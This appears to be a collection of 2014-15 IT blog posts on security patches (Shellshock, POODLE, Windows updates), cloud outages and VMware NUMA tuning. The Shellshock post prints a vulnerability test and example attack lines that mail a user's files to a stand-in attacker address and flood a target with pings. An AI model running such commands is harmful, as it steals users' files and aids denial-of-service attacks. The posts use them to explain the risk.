Best Practices to Combat Computer Security Issues in 2015

Cisco’s recently published 2015 Annual Security Report summarized the security trends it found in 2014 and advised on best practices to address predicted threats in 2015.  Some of the key security findings were:

  • Malware is getting better at evading detection
    With increasing attention to Java security the number of security exploits using Java decreased over the course of 2014.  However exploits are becoming more difficult to detect because they change quickly. They are expanding into technologies not often exploited before (e.g. Microsoft’s Silverlight) and they can involve multiple technologies (e.g. using both Flash Player and Javascript).

  • Spam is growing in volume and sophistication
    Cisco found that the volume of spam increased 250% from January to November in 2014 and spammers are finding more ways of evading spam filters.  Spam content, sender addresses, and originating IP addresses can all be difficult to differentiate from legitimate emails.  In the case of hiding the sender’s IP address spammers have been using a “snowshoe” method of emailing in where the emails are sent from a large number of (often infected) computers. So it isn’t possible to track the email back to a specific blacklisted address.

  • Known threats are still problems on outdated software
    2014’s headline security threats – Heartbleed and Shellshock – are still issues.  Cisco’s surveys found that 56% of the OpenSSL implementations were using versions greater than 4 years old and only 10% of the IE browsers accessing sites were using the current version.  The problem is not that patches aren’t being applied, it’s that versions aren’t being updated to ones where patches are available for vulnerabilities. Cisco provided the following recommendation:

    To overcome the guaranteed eventual compromise that results from manual update processes, it may be time for organizations to accept the occasional failure and incompatibility that automatic updates represent.

  • Users are a significant vulnerability
    Malware may be inadvertently downloaded from seemingly safe websites – Cisco found that many high-ranking, short lived websites contained malware.  Malware was also installed through browser add ons and software downloads – often with misleading and confusing install options that trick the user into agreeing to install the malware.  In Cisco’s survey of 70 companies there were 711 users affected by malware at the beginning of the year. Rising to a peak of 1751 users affected during the month of September.

Cisco provided several recommendations on how to deal with the current security climate:

  • Adopt a more sophisticated endpoint visibility, access, and security (EVAS) control strategy.
    Even if you are able to secure your network you still have to plan for what to do if an attack occurs.  Determining the scope of an attack that makes it past a network’s front door means monitoring the potential target endpoints within the network.  EVAS monitors the endpoint activity within a network before, during, and after attacks, allowing you to formulate a plan to deal with mitigating the threat and providing the tools to conduct a forensic analysis to prevent the problem from occurring again.

  •  Security must be integrated into the business
    Business planners and security staff must work together to ensure that security is an integral part of all IT plans.  However security that makes it difficult for users to access resources can result in users finding ways to circumvent security measures.  Security planning must consider both protection from threats and accessibility for users.

  • Users must be included in the security plans
    No security plan will be able to address all problems.  There are too many possible threats and they change too quickly.  Users must be trained on what activities are potentially dangerous and how to recognize when there is a problem as well as how to report problems.

VMware NUMA Performance

In our previous post we outlined how NUMA works with Virtual Machines (VMs) that either fit entirely into one NUMA home node or VMs that are divided into multiple NUMA clients with each client assigned its own home node. The following points should be considered when working with VMs that use NUMA hardware:

  • The hypervisor may migrate VMs to a new NUMA node on the host.
    Hypervisors adjust physical resources as needed to balance VM performance and fairness of resource allocation over all VMs. If the home NUMA node for a VM is maxed out on CPU, the hypervisor may allocate CPU from a different NUMA node even if that means incurring latency from accessing remote memory. When CPU is available on the NUMA node with VM memory the hypervisor will migrate the CPU resources back to that NUMA node in order to improve memory access. The hypervisor will factor in CPU usage, memory locality, and the performance cost of moving memory from one NUMA node to another in its determination of whether to migrate a VM to a different NUMA node.


    VMs may also be migrated in an attempt to achieve long term fairness. The CPU Scheduler in VMware vSphere 5.1 gives an example of 3 VMs on 2 NUMA nodes. The NUMA node with 2 VMs will split resources between the 2 VMs while the NUMA node with only one VM will have all resources allocated to that VM. In the long term migrating VMs between the two nodes may average out performance but in the short term it just transfers the resource contention from one VM to another with the additional performance cost of moving memory from one NUMA node to the other. This type of migration can be disabled by setting the advanced host attribute /Numa/LTermFairnessInterval=0.

  • VMs that frequently communicate with each other may be placed on the same NUMA node.
    VMware’s ESX hypervisor may place VMs together on the same NUMA node if there is frequent communication between the VMs. This “ action-affinity” can end up causing an imbalance in VM placement on NUMA nodes by assigning multiple VMs to the same home NUMA node and underpopulating other NUMA nodes. In theory the gain from the VMs being able to access common memory resources will offset the increase in CPU ready levels. In practice this may not be the case and this feature may be disabled by setting /Numa/LocalityWeightActionAffinity=0 in advanced host attributes.

  • Hyperthreading doesn’t count when VMs are assigned to NUMA nodes.
    The hypervisor looks at available cores when determining which NUMA node to assign as the home node for a VM. If a NUMA node has 4 physical cores and a VM is allocated 8 processors, then the VM would be divided into 2 NUMA clients spread over 2 nodes. This ensures CPU resources but may increase memory latency. If a VM is running a memory intensive workload it may be more efficient to restrict the VM to one NUMA node by configuring the hypervisor to take hyperthreading into account. This is done by setting the numa.vcpu.preferHT advanced VM property to True.

  • VMs migrating between hosts with different NUMA configurations may experience degraded performance.
    For VMs moving to a host with smaller NUMA nodes, it is possible that they will need to be split into multiple NUMA clients, while hosts with larger NUMA nodes may be able to merge wide VMs into a single node. Performance will be degraded until the hypervisor on the new host can configure the VMs for the new host NUMA configuration.

  • VMs spread over multiple NUMA nodes may benefit from vNUMA.
    Some applications and operating systems can take advantage of the NUMA architecture to improve performance. A VM running these applications or operating systems that is spread across multiple NUMA nodes can be configured to use virtualized NUMA (vNUMA) to take advantage of the underlying architecture just as if it were on a physical host leading to large performance gains. However if the VM migrates to a new host and the NUMA configuration on the new host is different this could end up degrading performance until the VM can be restarted using the new vNUMA configuration.

While adjustments to the hypervisor’s NUMA algorithms may provide some performance improvements, the last two items are the most important takeaways. It is a best practice to ensure that hosts in a cluster have the same NUMA configuration to avoid performance issues when VMs move from one host to another.

How to Minimize CPU Latency in VMware with NUMA

On the most basic level CPUs do one thing: process data based on instructions. The faster the CPU the faster it processes data. But before a CPU can process data it has to read both the data and the instructions from slower system RAM and that latency can slow the CPU processing. In order to minimize the time the CPU is waiting on reading data, CPU architectures include on-chip memory caches that are much faster than RAM. However even though the on-chip caches have hit rates that are better than 95% there are still times when the CPU has to wait for data from RAM.

When the CPU reads from RAM the data is transferred along a bus shared by all the CPUs on a system. As the number of CPUs in a system increase the traffic along that bus increases as well, and CPUs can end up contending with each other to access RAM. This is where NUMA comes in – NUMA is designed to minimize the problem of system bus contention by increasing the number of paths between CPU and RAM.

NUMA (Non Uniform Memory Architecture) breaks up a system into nodes of associated CPUs and local RAM. NUMA nodes are optimized so that the CPUs in a node preferentially use the local RAM within that node. The result is that CPUs typically contend only with other CPUs within their NUMA node for access to RAM rather than with all the CPUs on a system.

As an example consider a system with 4 processor sockets, each with 4 cores and 128 GB RAM. Without NUMA that comes to 16 physical processors that could potentially be queued up on the same system bus to access 128 GB RAM. If this same system were broken up into 4 NUMA nodes each node would have 4 CPUs with local access to 32 GB RAM.

The ESXi hypervisor can manage virtual machines (VMs) so that they take advantage of the NUMA system architecture. The VMware 5.1 Best Practices Guide divides VMs running on NUMA into 2 groups:

  1. The number of virtual CPUs for a VM is less than or equal to physical CPUs in the NUMA node.
    The ESXi hypervisor assigns the VM to a home NUMA node where memory and physical CPU are preferentially used. Best practices in this case are that the allocated VM memory be less than the NUMA node memory. As far as the VM is concerned it is effectively on a non-NUMA system where all CPU and memory resources are local.

  2. The number of virtual CPUs for a VM is greater than the number of physical CPUs in the NUMA node (“Wide VMs”).
    Wide VMs are split into multiple NUMA clients with each client assigned a different home NUMA node.  For example, if a system had multiple NUMA nodes of 1 socket with 4 cores each (4 physical CPUs/node) and a wide VM had 8 virtual CPUs then ESXi can divide the VM into two NUMA clients with 4 physical CPUs each assigned to 2 different home NUMA nodes. The problem with dividing a wide VM into multiple NUMA clients is that it introduces the possibility that one of the client nodes may need to access memory from a different NUMA client node.

Note: In a previous post we discussed hyperthreading – as per The CPU Scheduler in VMware vSphere 5.1, hyperthreading isn’t taken into account when you’re calculating the number of available virtual processors on a NUMA node.

In our next post we’ll take a look at using virtual NUMA (vNUMA) to minimize wide VMs accessing remote NUMA memory and what happens when VMs configured to use NUMA are migrated to a host with a different NUMA system configuration.

Just When You Thought Your Devices Were Secure…

Last month’s Shell Shock bug had Unix, Linux and Network admins patching their systems against a bash shell vulnerability. This month everyone gets to play along as October adds patches for Microsoft, Adobe, Oracle and a new SSL bug named POODLE.

  • Microsoft October 2014 patches
    Microsoft has issued 3 Critical and 5 Important patches. One of the Critical patches addresses 14 vulnerabilities in Internet Explorer versions 6 through 11, although the bugs are only rated as Moderate in IE 6. As discussed in a previous post Microsoft can’t test every possible configuration. I suggest installing patches on test systems in your own environment before deploying throughout your Windows environment.

  • Adobe Flash Player patches
    Adobe has issued patches for both Cold Fusion (Important) and Flash Player (Critical). The Critical Flash Player patches cover Windows, Mac, Linux, Android and iOS and include patches for both Flash Player and Adobe AIR. Adobe also recommends upgrading to the latest versions in addition to patching, and you’re better off patching and upgrading Flash sooner rather than later. You may also want to consider using a Flash Block/Flash Control plugin or configuring IE to require you to approve sites before you allow them to run Flash Player content.

  • Oracle Critical Patch Update
    The National Vulnerability Database lists 131 CVE vulnerabilities for Oracle in October 2014. Oracle patches also cover their Java, Solaris and MySQL acquisitions and the patches for Java SE on Windows rate up to 10 out of 10 for severity level. The Oracle update page provides an extensive risk matrix for each of the patched applications – use this to evaluate the severity of the vulnerability for your specific applications and then test and patch accordingly.

  • POODLE bug in SSL3.0
    POODLE stands for Padding Oracle On Downgraded Legacy Encryption (CVE-2014-3566) and works by listening in and decrypting less secure SSL 3.0 traffic. Most web servers and clients use the secure TLS protocols for HTTPs connections and will fail back to SSL 3.0 only for legacy applications.. However it is possible for hackers to interfere with a HTTPs session negotiation so that TLS fails and the session fails back to the SSL 3.0 allowing this bug to be exploited. The patch for POODLE is to remove the SSL 3.0 protocol from web servers and clients or to disable failback to SSL 3.0 if you need to maintain legacy applications.  This vulnerability should be addressed for both web servers and web clients as soon as possible but is rated as 4.3 (Medium) and is nowhere near the threat level of either Shell Shock or Heartbleed.

    Microsoft provides instructions on a registry edit to disable SSL 3.0 for IIS web servers and askubuntu.com has information on how to remove SSL 3.0 support for Apache, Nginx and other web servers. Qualys SSL Labs provides an SSL Server test that will evaluate the security of your site for SSL 3.0 and other potential vulnerabilities.

    Qualys also provides a browser test for SSL 3.0 support. Eventually newer browsers will stop supporting SSL 3.0 but until then it can be disabled:

    • Firefox
      Set “security.tls.version.min” to 1 in “about:config” – or use the Disable SSL 3.0 plugin to do it for you.

    • Google Chrome
      You can use the startup flag “–ssl-version-min=tls1” to start Chrome without SSL 3.0 support. Recent versions of Chrome also support the TLS_FALLBACK_SCSV mechanism that prevents failing back to SSL 3.0.

    • Internet Explorer
      In Tools – Internet Options – Advanced – Security, uncheck the boxes for SSL 2.0 and SSL 3.0.

Maximizing VM Performance and CPU Utilization

In a previous post we discussed memory management in VMware and the allocation of memory. Memory over allocation is when you provision your virtual machines with more memory than actually exists on the host machines. Memory over allocation works because the hypervisor assigns memory to virtual machines as needed rather than as provisioned. Do you have a server that needs 2 GB memory for 10 minutes each night and functions at .5 GB for the rest of the day? The hypervisor will run the VM with .5 GB of memory, increase it to 2 GB as needed for 10 minutes, and then reclaim the memory when it hasn’t been used for a while and is needed elsewhere.

The safest scenario is to plan for the case where all VMs are using their maximum memory allocation and only assign existing resources. However this leaves a lot of idle memory on the table that could be used for additional VMs. If you use that idle memory to provision additional VMs the (unlikely) worst case scenario would be if all the VMs spiked memory to 100% at the same time causing the hypervisor to start swapping and leading to severe performance degradation. The additional VMs you could create from memory over allocation aren’t worth the risk for a mission critical VM. However if you need to squeeze in a couple more web servers or virtual desktops then memory over provisioning is useful.

Just as with VM memory, CPU is usually highly underutilized and can be over allocated without compromising performance. As per the Performance Best Practices for VMware vSphere 5.5:

In most environments ESXi allows significant levels of CPU overcommitment (that is, running more vCPUs on a host than the total number of physical processor cores in that host) without impacting virtual machine performance.
(p. 20)

 

Without over allocation the total number of vCPUs is limited to the number of physical CPU cores (pCPU) on a host:

(# Processor Sockets) X (# Cores / Processor)  = # Physical Processors (pCPU)

If the physical processors use hyperthreading:

(# pCPU) X (2 logical processors / physical processor) = # Logical Processors

If you’ve got 2 processors with 6 cores each that would provide 12 pCPUs or 24 pCPUs with hyperthreading enabled. However hyperthreading works by providing a second execution thread to an existing core. When one thread is idle or waiting the other thread can execute instructions. This can increase efficiency if there is enough CPU Idle time to provide for scheduling two threads. However in practice performance increases are up to 30% rather than the 2x CPU suggested by the logical CPU count formula.

In addition to considering the effect of hyperthreading you will also need to consider the type of workloads being run by processors and whether you are using NUMA (Non-Uniform Memory Access) hardware. We’ll delve into the intricacies of tuning vCPUs, workloads, and host hardware in a later post. For now Best Practices for Oversubscription of CPU, Memory and Storage suggests starting with one vCPU per VM and increasing as needed and quotes recommendations for the maximum ratio of vCPUs to pCPU varying from 1.5 to 15.

The Best Practices paper lists several metrics to monitor in order to determine the best vCPU to pCPU ratio for your environment:

VM CPU Utilization: To determine if a VM requires additional vCPU resources.
Host CPU Utilization: To determine overall pCPU utilization.
CPU Ready: Measures the amount of time a VM has to wait for pCPU resources. VMware recommends this should be less than 5%.

Maximum CPU for both Host and VM is typically set at 80% but this value should be adjusted depending on your workload and hardware.

Shell Shock Patch Update

Five additional bash bugs have been discovered since our post about the CVE-2014-6271 Shell Shock bug last week: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187. Vendors have been issuing patches to address vulnerabilities as they were announced and early versions of Shell Shock patches will not cover all the vulnerabilities. ZDNet has a good write up of tests that can be used to determine which vulnerabilities have been patched and which are still open to attacks.

As previously mentioned operating systems and network devices that use bash will need to be patched:

  • Apple: The Register has an update with links to Apple patches.
  • Cisco: A frequently updated Cisco Security Advisory breaks down supported Cisco products into “Under Investigation”, “Vulnerable”, and Confirmed Not Vulnerable”, and provides instructions on how to patch vulnerable products or how to purchase upgrades if you don’t have Cisco support.
  • F5: F5 provides a list of vulnerability assessments by product and version.
  • Oracle: Oracle’s security advisory uses the same Vulnerable/Not Vulnerable/Under Investigation breakdown as Cisco and provides links to available patches. You will need an Oracle account to get the patches.
  • VMware: VMware’s Knowledge Base article 2090740 states that while ESX 4.0 and 4.1 are no longer supported they are potentially vulnerable and VMware will provide patches. The complete list of patches is available at VMSA-2014-0010 and includes patches for VMware virtual appliances. ESXi is not vulnerable as it uses the ash shell instead of bash.

Check with your vendor if they are not in the above list and check for updates frequently.

Are You Vulnerable to the Shell Shock Bug?

I’ve written a few posts where I’ve advocated moving from XP to Linux and stated that one of the benefits of Linux is that it is relatively malware and virus free. Not completely secure but relatively so. One avenue of attack for Linux and other Unix variants is that they have some basic core utilities that were written before internet security was a significant consideration and potential exploits are now being found in that comparatively ancient foundation.

Case in point: CVE-2014-6271, dubbed the Shell Shock bug. As per the explanation from seclists.org the problem is that the bash shell in Unix/Linux allows you to define a variable as a function. However bash continues to process the code past the end of the function definition. The following command contains an example of the flaw that can be used to determine if you’re vulnerable:

env X='() { :;}; echo you are vulnerable' bash -c 'echo this was a test'

If you run this command and see “you are vulnerable” and “this was a test”, then the flaw can be exploited on your system. If all you see is “this was a test”, then you’re ok. The part of the command listed above that is a problem is the “echo you are vulnerable” section as it can be configured to run any command. In most cases the Shell Shock bug won’t run with root permissions so it won’t be able to delete system files. However even a minimally privileged user account can mail all a user’s files to a hacker (cd; cat * | mail –s “all my files” hacker@hacker.org ), or set a computer up as a node in a DDOS attack (ping –c 9999999 ddos.target.com), or fill in your own computer security worst nightmare scenario.

Another factor is that Linux and Unix computers aren’t the only vulnerable systems. The bash shell is used on network devices, is embedded into the “internet of everything”, and is the base for Apple systems. The problem isn’t that it’s difficult to patch, the problem is that it is difficult to patch every bash shell with this vulnerability. Given the patch issues Apple has had recently they need to do their best to impress upon their users that the Shell Shock patch is a critical security update.

Is this as serious a threat as Heartbleed was? Yes. In fact it may be worse because it’s easier to exploit. Heartbleed exploited the possibility of finding confidential information in a random memory dump. Shell Shock can be exploited through CGI scripts in http headers and depends mostly on finding a vulnerable device. Hackers have already created worms to find devices and exploit Shell Shock less than a day after the vulnerability was announced.

In the last post I discussed how it’s a good idea to wait before you apply some patches. For OS patches like the quickly pulled iOS 8.0.1 you’re better off waiting. Security patches should be applied as soon as possible. With a vulnerability like Shell Shock you need to check all your systems, patch them as soon as patches are available and enact a mitigation plan until everything is patched.

Unfortunately final patches may take a while and bash updates issued as of 9/25 may not completely fix the problem. We will likely see multiple rounds of patches before this is fully addressed.


10/1/14 Update: See Shell Shock Patch Update for information on additional bash bugs and links to vendor patches.

Should Automatic Updates Be Enabled On Your Computer?

In the best of all possible worlds every software update would work perfectly and there would be no question about whether you should enable automatic updates. However updates can and have caused significant problems ranging from annoying errors to blue screen crashes, which raises the question of whether automatic updates should be used at all.

When complaining about patch problems Microsoft is an easy and obvious target. They issue patches on a known schedule and have an install base that is diverse enough that it’s impossible for them to test every patch with every software permutation. Software incompatibilities are inevitable and problems are widely publicized but Microsoft eventually sorts out the problems and withdraws or reissues patches. In the case of Microsoft patches it is usually best to wait a few days to check for problems in the field before installation.

Patching third party software is just as critical as patching your operating system and these patches can have problems as well. As reported by The Register an update to Symantec’s Norton Internet Security (NIS) via their Live Update just before Labor Day weekend caused browsers to crash, mainly on systems running XP. Since Microsoft no longer provides patches for XP, third party security products (such as NIS) may be used as the primary line of defense for XP users, and the interim advice quoted on Symantec forums of upgrading to Windows 7 or turning off browser protection was not particularly helpful. Eventually a fix was disseminated through Live Update and the problem was purported to have been caused by older hardware rather than XP itself.

One of the significant differences between Microsoft OS patches and third party software patches is that a problem with an OS patch has a greater possibility of causing a system crash, while a third party program patch would be more likely to cause the program being patched to have an issue. Security software updates virus definitions may need to be disseminated quickly, and even with the possibility of software problems you’re better off with the updated definitions.

This prompts the questions – what should be automatically updated? By default most third party software is configured to update automatically. Should you go through each of your programs and reconfigure them to only install patches that you have approved?

The answer is that it depends:

  • Do you have alternate software with the same functionality?
    If you have Chrome, IE, Firefox and Opera, and a bad patch takes out one of them the others are still available to search and download fixes.
  •  

  • Is your operating system configured in some way that may not have been tested when the patch was created?
    Are you running relatively old hardware? Do you have an English language OS with Asian and/or Cyrillic fonts installed? Have you tweaked the settings in your antivirus program? Make sure you’ve backed your system up before applying any patches and that you know how to restore it. As we discussed in a previous post, not every software permutation can be tested and incompatibilities can cause blue screens.
  •  

  • Is your OS officially supported for the software?
    Programs written for XP may work on newer Windows versions but OS updates could break dependencies in legacy software. Keep track of OS updates and check the functionality of legacy software to determine if a patch needs to be rolled back to keep the software working.
  •  

  • Is the software frequently patched? Are critical vulnerabilities being patched?
    Adobe Reader and Adobe Flash Player are both patched frequently and patched for critical vulnerabilities. Java Runtime (JRE) can also be a high vulnerability target on your computer. Adobe products and JRE should be configured for auto updates as should updates for virus definitions.

Keep in mind that the possibility of a patch causing a problem is relatively minor and even a patched system will never be completely safe. There will always be a gap between when newly discovered vulnerabilities start to be exploited and when patches are available for them. The only way to address that gap is by training your users on what they should not be doing on the internet.

512k Day Isn’t the Cloud’s Only Network Problem

August 12th was 512k day – the day when the IPv4 BGP routing table entries reached 512k routes. This matters because there are routers that have a default limit of 512k IPv4 routes, and if these routers haven’t been modified to increase this limit they could crash or fail to load new routes. There are fixes for this problem and not all routers are affected, but even with advanced notice there were still outages and slowdowns when the number of routes passed 512k.

The thing to note about this outage isn’t just that known problems were not addressed, it’s even if your network was configured perfectly, and a remote resource vendor was providing a promised 99.999% uptime, there still could be a service outage from your perspective if there was a problem in the network between you and your provider. This is especially important when considering moving your resources to the cloud. While a cloud based EMR system may provide tremendous benefits at a cost effective rate, a doctor can’t do their job if there is a problem with a hospital’s internet connection and they can’t get test results or medical history.

The 512k limit wasn’t the first network disruption and it will not be the last. As soon as a clever way is developed to manage the internet, an even more clever way will be found to hack it. Basic infrastructure equipment that has been working for years without any issues can become a victim of specifications that are now obsolete. In short, there is no way to guarantee uptime for anything accessed over the internet. Accepting the possibility of downtime is the price you pay for the economies of Cloud computing.

If you can accept the possibility of downtime and Cloud computing is a fit for your company, one main criteria in selecting a Cloud provider should be its availability as seen from your site. Test to verify that you can consistently access the provider with minimal latency during your trial period, and archive the data to create your own availability SLA reports for each prospective vendor. Also collect data on network bandwidth for each provider as well, and extrapolate the data from your test environment up to an estimated usage in a full deployment.

To look at a provider’s performance over a longer term, services such as downdetector.com aggregate user reports of downtime and can provide an archive of previous issues. Downtime from the perspective of previous clients can also provide insight into how a Cloud vendor handles support issues after you’ve implemented their software. Detailed post-mortems of issues are welcome but not the norm. However support through Twitter and updates via Facebook are common and provide a history of previous issues.

Should network outages mean you have to rule out Cloud computing? The possibility of outages is definitely a factor to consider, but how significant those outages are to you will depend on your network, the Cloud provider, and how sensitive you are to losing services.

Windows Patch Problems

The Windows August Update released on 8/12/14 included 4 updates for Windows 7, 8 and 8.1 that were linked to blue screens. Since the release all 4 patches have been pulled back by Microsoft, but if you have Automatic Updates configured on your computer and the patches were applied Microsoft has provided manual instructions on removing the patches (see section on Mitigations). Please note that the removal instructions are done in safe mode – if your computer won’t boot to safe mode you may need to resort to whatever recovery utilities came with your PC.

If you have Automatic Updates configured to download patches and ask before installing, check the list of recommended patches and make sure the following patches are not selected for installation:

  • 2982791  MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
  • 2970228  Update to support the new currency symbol for the Russian ruble in Windows
  • 2975719  August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
  • 2975331  August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012

This isn’t the first time patches have been released and then pulled back or needed to be patched themselves:

This is by no means a complete list, but it illustrates that patches intended to make a system perform better and run more securely can have unintended consequences. The problem is not that the patches haven’t been tested before release, but rather that there is no way to test every possible system permutation. For example, the April 2013 issue was caused by a Brazilian third party banking security software, and the most recent patch problem happened if “OpenType Font files are installed in non-standard font directories that are recorded in the registry with fully qualified filenames” .

Does the chance of a crash mean you should disable updates? Of course not – that would be leaving your computer vulnerable to security problems. It does mean that you should disable automatic updates and make sure the updates must be approved before installation. In addition check for reports of issues with updates before installing them and only apply patches intended for your system.